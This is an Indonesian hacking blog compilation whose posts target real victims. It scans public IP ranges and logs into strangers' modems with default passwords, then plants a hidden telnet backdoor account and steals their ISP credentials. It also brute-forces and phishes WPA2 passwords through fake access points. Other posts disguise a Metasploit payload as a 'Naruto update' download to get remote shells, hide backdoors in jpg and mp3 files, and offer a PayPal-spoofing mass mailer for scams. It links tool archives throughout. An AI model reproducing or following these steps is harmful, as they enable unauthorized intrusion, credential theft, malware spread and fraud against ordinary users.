Hack modem dan hack password speedy lalu pasang multiuser

Langsung aja ne sesuai judul

Yuk mulai..

Pertama-tama Download dulu angry ip scanner --> https://dl.dropboxusercontent.com/s/rb5s80o8y7dx0jq/ipscan221.rar?token_hash=AAE6ZOhyAnpRMQWT53yJ0D9szMbxJ5Y5gWahGAVV52Rl-g&dl=1

cari tahu IP Public speedy yang sedang anda pakai, caranya banyak, salah satunya masuk pada
http://www.whatismyip.com/

ip public saya 180.247.12.233

yuk kita lakukan scanning menggunakan Angry IP Scanner yang sudah kita download tadi.coba scan dari 1-255
jadinya 180.247.12.1-255

hmm . . . ane coba hack modem dari IP 180.247.12.149

coba buka browser dan masukkan IP korban pada adrress bar lalu muncul halaman login
masukkan password default
kalau beruntung passwornya default yaitu

user = user  &   pass = user    atau

user = admin   &  pass = admin

kalau gagal login cari korban lain yang masih cupu alias masih menggunakan default password

kalau pengen maju terus semangat 45 coba crack password yang sudah di ganti password defaultnya dengan menggunakan tool hydra atau medusa

disini korban saya masih menggunakan password default

dan saya berhasil masuk modem korban

disini korban menggunakan modem tplink lau rubah password adminya pada maintenace > administrator
masukkan password admin

Setelah masuk coba buka program putty kalau belum punya bisa download Putty
 https://dl.dropboxusercontent.com/s/4vyqaltx6llsw3y/putty%20and%20winSCP.rar?token_hash=AAF5WnBR28YrIDTFAwkgMO-_I2aodyVE5qfgj0sByX0AYw&dl=1
 buka putty lalu masukkan ip public korban tadi dan ubah mode menjadi telnet

 kalau sudah masuk telnet coba masukkan user dan password modem yang telah di rubah tadi {admin}

sekarang kita membuat akun backdoor multiuser agar kita dapat masuk ke modem korban sewaktu-waktu jika password default modem telah dirubah korban

ketikkan perintah

sys multiuser trojanzboy 1234567890

ket
trojanzboy       = user ( bisa diganti sesuai keinginan kalian)
1234567890   = password ( bisa diganti sesuai keinginan kalian)

dan mode telah diset 1

setelah selasai tugas kita selanjutnya mencari akun speedy korban
ketikkan perintah

show all

maka keterangan lengkap mengenai modem tertera sekarang cari ppp username dan ppp password pada modem

dan ketemu sekarang coba kalian login ke akun speedy pada alamat http://telkomspeedy.com/info-pemakaian-speedy

dan masukkan username&password yang kalian temukan pada pppusername&password modem

dan sukses bro loginnya

Read More

Hack wpa/wpa2 tanpa wpa handshake (bruteforce) dengan airlin

tutor kali ini akan membahas cara hack password wpa/wpa2 pada area hospot yang terkunci security wpa2

dengan tool airlin kita bisa bruteforce security wifi tanpa wpa handshake

langsung saja

download toolnya --> https://dl.dropboxusercontent.com/s/1tzd6tli6tj79dl/airlin-1-0-1.rar?token_hash=AAF6R-pzhL9prTTWQnR4xmvb9UhhNImeL49K62F40KOXvw&dl=1

taruh hasil download pada desktop lalu ekstrak dengan perintah

unrar x /root/Desktop/airlin-1-0-1.rar

setelah itu masuk folder airlin

cd Desktop/airlin-1-0-1
chmod 777 airlin.sh
mv airlin.sh /usr/bin/airlin.sh

setelah ailin dipindah folder ke /usr/bin lalu keluar dan buka terminal lagi
dan jalankan program airlin.sh



pilih interface kalian disini saya menggunakan wlan0

 Lalu cari korban wifi yang terproteksi wpa/wpa2
aktifkan airmon-ng dan scan dan scan dengan airodump-ng dengan membuka tab baru dengan menekan ctrl + shift + t

disini korban testing saya TrojanzBoy@wifi yang di proteksi wpa2

lalu copy paste essid wifi tersebut

lalu pilih wordlist kalian
disini wordlist saya ada pada /root/Desktop/trojanzboy.txt

lalu  isi kan delay nya
jangan terlalu cepat delaynya itu berakibat airlin gak bisa membruteforce dengan akurat

disini saya memilih delay 25

ok tunggu hingga proses brute selesai

dan password pun di temukan

Read More

Membuat Form Pemesanan Produk

<div style="border: solid 1px #000000;"><form action="http://www.SnapHost.com/captcha/send.aspx" id="ContactUsCaptchaWebForm" method="post" onsubmit="return ValidateForm(this);"> <input name="skip_WhereToSend" type="hidden" value="Email Anda" /> <input name="skip_SnapHostID" type="hidden" value="BM833MKCXEXQ" />
<input name="skip_WhereToReturn" type="hidden" value="url halaman Konfirmasi" /> <input name="skip_Subject" type="hidden" value="Contact Form" /> <input name="skip_ShowUsersIp" type="hidden" value="1" /> <input name="skip_SendCopyToUser" type="hidden" value="1" /> <script type="text/javascript"> function ValidateForm(frm) { if (frm.Nama.value == "") {alert('Nama harus di isi.');frm.Nama.focus();return false;} if (frm.Dari.value == "") {alert('Alamat email harus di isi.');frm.Dari.focus();return false;} if (frm.Dari.value.indexOf("@") < 1 || frm.Dari.value.indexOf(".") < 1) {alert('Tolong masukan alamat email yang benar.');frm.Dari.focus();return false;} if (frm.Pesan.value == "") {alert('Silahkan kirimkan komentar atau pertanyaan.');frm.Pesan.focus();return false;} if (frm.skip_CaptchaCode.value == "") {alert('Masukan kode di samping.');frm.skip_CaptchaCode.focus();return false;} return true; } function ReloadCaptchaImage(captchaImageId) { var obj = document.getElementById(captchaImageId); var src = obj.src; var date = new Date(); var pos = src.indexOf('&rad='); if (pos >= 0) { src = src.substr(0, pos); } obj.src = src + '&rad=' + date.getTime(); return false; } </script> <br /> <table border="0" cellpadding="5" cellspacing="0" style="width: 600px;"><tbody> 

<tr> <td><b>Nama Produk :</b></td> <td><input maxlength="60" name="Nama" style="width: 350px;" type="text" /></td> </tr>

<tr> <td><b>Nama Anda :</b></td> <td><input maxlength="43" name="NomorTelepon" style="width: 350px;" type="text" /></td> </tr> 

<tr> <td><b>Nomor HP :</b></td> <td><input maxlength="43" name="NomorTelepon" style="width: 350px;" type="text" /></td> </tr> 

<tr> <td><b>Email :</b></td> <td><input maxlength="60" name="Dari" style="width: 350px;" type="text" /></td> </tr>

<tr> <td><b>Pesan :</b></td> <td><textarea cols="40" name="Pesan" rows="7" style="width: 350px;"></textarea></td> </tr> <tr> <td align="center" colspan="2"><table border="0" cellpadding="0" cellspacing="0"><tbody> <tr><td colspan="2" style="padding-bottom: 18px;"><a href="http://www.snaphost.com/" rel="nofollow" style="color: #000099; font-family: Verdana, Arial, Helvetica; font-size: 11px; text-decoration: none;" target="_blank"> Kontak form ini dilindungi dari SPAM by : <span style="text-decoration: underline;">SnapHost.com</span></a></td></tr> <tr valign="top"><td><i>Masukan kode berikut*.</i> <input maxlength="6" name="skip_CaptchaCode" style="width: 80px;" type="text" /></td><td><a href="http://www.snaphost.com/" rel="nofollow" target="_blank"><img alt="Web Form Code" src="http://www.SnapHost.com/captcha/CaptchaImage.aspx?id=BM833MKCXEXQ&amp;ImgType=2" id="CaptchaImage" style="margin-left: 20px;" title="Anti-spam web forms" /></a></td></tr> </tbody></table> * Harus Di Isi. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <input name="skip_Submit" type="submit" value="Kirim" /></td></tr> </tbody></table> </form></div>

Read More

Membuat access point palsu dengan wifihoney untuk mendapatkan wpa handshake

oke langsung saja yapz  .  .
buka terminal dan kita scanning wifi yang akan di bajak aktifkan airmon-ng
dengan menggunakan perintah

airmon-ng start wlan0

 ganti wlan0 dengan interface kalian

setelah mode monitor aktik saatnya scanning korban

airodump-ng mon0

target wifi dengan security wpa2 dengan essid =  trojanzboy@wifi channel = 3




setelah selesai menentukan korban

sekarang buka menu backtrack > expoitation tools > wireless exploitation tools > wlan exploitation > wifihoney

lalu masukkan perintah ./wifi_honey.sh <essid> <channel> <interface>

./wifi_honey.sh TrojanzBoy@wifi 3 wlan0

maka terciptalah wifi-wifi palsu

dan tunggu hingga korban connect ke salah satu wifi  dan memasukkan password
tunggu hingga dapat wpa handshake dari akses point yang aslinya

maka wpa handshake yang asli pun kita dapatkan

saatnya pengecrack kan hasil handshake

buka terminal baru masuk directory dengan perintah

 cd /pentest/wireless/wifi-honey

setelah itu cek hasil capture dengan perintah 

ls

setelah menentukan hasil cap sekarang buka masukkan perintah aircrack

aircrack-ng -w /root/Desktop/Trojanzboy.txt /pentest/wireless/wifi-honey/cap-01.cap

 /root/Desktop/Trojanzboy.txt adalah letak wordlist yang telah saya dibuat bisa di kreasikan se kreatif mungkin agar password terpecahkan
dan cari nomer yang ada handshake dari akses point asli

dan tunggu hasilnya

SUKSES bro . . !!!

Read More

Exploit windows dengan Syringe bypass av

disini saya akan mempraktekkan cara exploit windows dengan syringe inject
pada ip publik biar seru tidak lagi pada local area

ok

langsung saja ya download scriptya di --> https://dl.dropboxusercontent.com/s/stqllmoj3skep0t/syringe%28by%20Trojanzboy.blogspot.com%29.rar?token_hash=AAEP3DPIVH3dBc149VC27UelZCf93Vn6NLPoJtGtWEp-EA&dl=1

lalu ekstrak pada DESKTOP maka terdapat dua file
1. syringe.sh
2. syfile.tar

langsung saja buka terminal dan masuk ke desktop

jangan lupa chomod 777 ya pada file syringe.sh

setelah di chmod buka file syringe.sh dan rubah ip public kalian
ip public saya = 125.164.221.221
ip local saya = 192.168.1.36

cara lihat ip public bisa masuk http://www.whatismyip.com/

edit syringe.sh

setelah di setting saatnya beraksi

balik lagi ke terminal tadi lalu ketikkan perintah

./syringe.sh

dan tunggu hingga payload terbuka dan metasploit run automatic

nah exploit selesai saatnya memforward ip local kita
masuk ke modem router 192.168.1.1
masukkan password anda
kita setting pada router/modem di NAT

jangan lupa masukkan port 80 untuk apache
dan 4444 untuk payload listener

setelah router tersetting aktifkan apache
pada menu backtrack >> service >> httpd >> apache start


kalau sudah selesai saatnya membungkus ip public kita agar tidak telanjang biar korban tidak curiga dengan menggunakan http://freedns.afraid.org/

daftar setelah daftar langsung isi domain anda terserah buat pengecohan korban

setelah selesai save

dns punya saya narutoupdate.strangled.net

sekarang menggabungkan url dengan listener metasploit
disini saya namakan trojanzboy.exe

jadinya http://narutoupdate.strangled.net/trojanzboy.exe

dan saatnya menyebarkan link backdoor anda
tunggu hingga korban masuk dalam link anda dan mendownloadnya

dan session meterpreter pun terbuka

syringe av

Read More

Memanipulasi backdoor pada mp3,word jpg, dan ekstensi lainya

sesuai judul disini kita akan menyisipkan backdoor pada .doc.mp3.jpg dan ekstensi lainya
kita asumsikan netcat itu adalah backdoor/server kita

langsung aja ya download dulu programnya  https://dl.dropboxusercontent.com/s/ui3evmrbp0k8g7u/Backdooring%20exec.rar?token_hash=AAG9YwfV4mAZgKm5RssDM_lBiusBdsMVDpCK9u5iNAWnWw&dl=1


setelah di download buka programnya

1. browse your server --> masukkan server backdoor disini saya contohkan netcat sebagai backdoor saya
2. pada file ekstensi isi ekstensi terserah kalian yang suport executable  misalnya .jpg
3. browse file --> cari file gambar pada drive anda yamg berekstensi .jpg
4. browse icon kita bisa buat icon semenarik mungkin agar korban terkecoh caranya masuk pada web  http://www.prodraw.net/favicon/index.php dan upload gambar yang ingin dijadikan icon
lalu UPLOAD dan pilih resolusi dan generate

 dan download

5. setelah memilih icon saatnya pilih hasil output keluaran inject disini saya taruh di desktop saja dan mulai menginjectkan ke file .jpg

dan jika si testserverrcsC.jpg di buka maka netcat yang kita asumsikan sebagai backdoor pun juga ikut jalan

 dan kita test lagi dengan ekstensi .mp3

netcat kita asumsikan sama sebagai backdoor kita

dan rubah pada exstension dengan mp3 jangan lupa pada browse kita cari file mp3 kita dan simpan pada desktop

lalu mulai menginjectkan

 lalu terbentuklah file di desktop yang telah disisipkan netcat sebagai backoor kita

dan jika korban menjalankan mp3 yang telah kita sisipin backdoor maka
mp3 akan play dan si netcat juga jalan

 dan sekarang hasil output itu siap upload ke public . .

Read More

Membuat fake mail untuk penipuan , phising , SCAM dengan PHP

Fake Mailer atau dalam istilah gaulnya fake email adalah teknik memanipulasi header email agar terbentuk email palsu untuk mengelabuhi penerima email. Teknik ini adalah satu fenomena perkembangan kemajuan teknologi informasi.

Fake mailer ini juga bisa di kirim ke semua mail box penyedia layanan email seperti yahoo, gmail, hotmail dan lain sebagainya. Bahkan, anda bisa mengirimkan email atas nama teman anda serta nama samaran lainnya.

Oke langsung saja kita mulai , sebelumnya saya akan kasih tau SC nya dulu

Berikut SC nya, tapi tunggu dulu, sebelum anda menggunakan script ini anda harus mempunyai domain dan hostingan sendiri
bisa buat hosting gratisan ataupun hasil curian alias deface

download scriptnya di --> https://dl.dropboxusercontent.com/s/gt5oxlysvlxs38z/massmail.rar?token_hash=AAGv8lyYIVyTBrihilxRIvYmEHZ7u8A_h5j6LVPzPcJ9ZQ&dl=1 

screenshoot

 keunggulan dari script ini kita bisa kirim banyak ke email sekaligus

lihat

dan send to inbox

lalu dalam inbox email korban

akan tertera paypal sebagai pengirimnya

demo = http://anekatop.com/wp-content/themes/example/massmail.php

Read More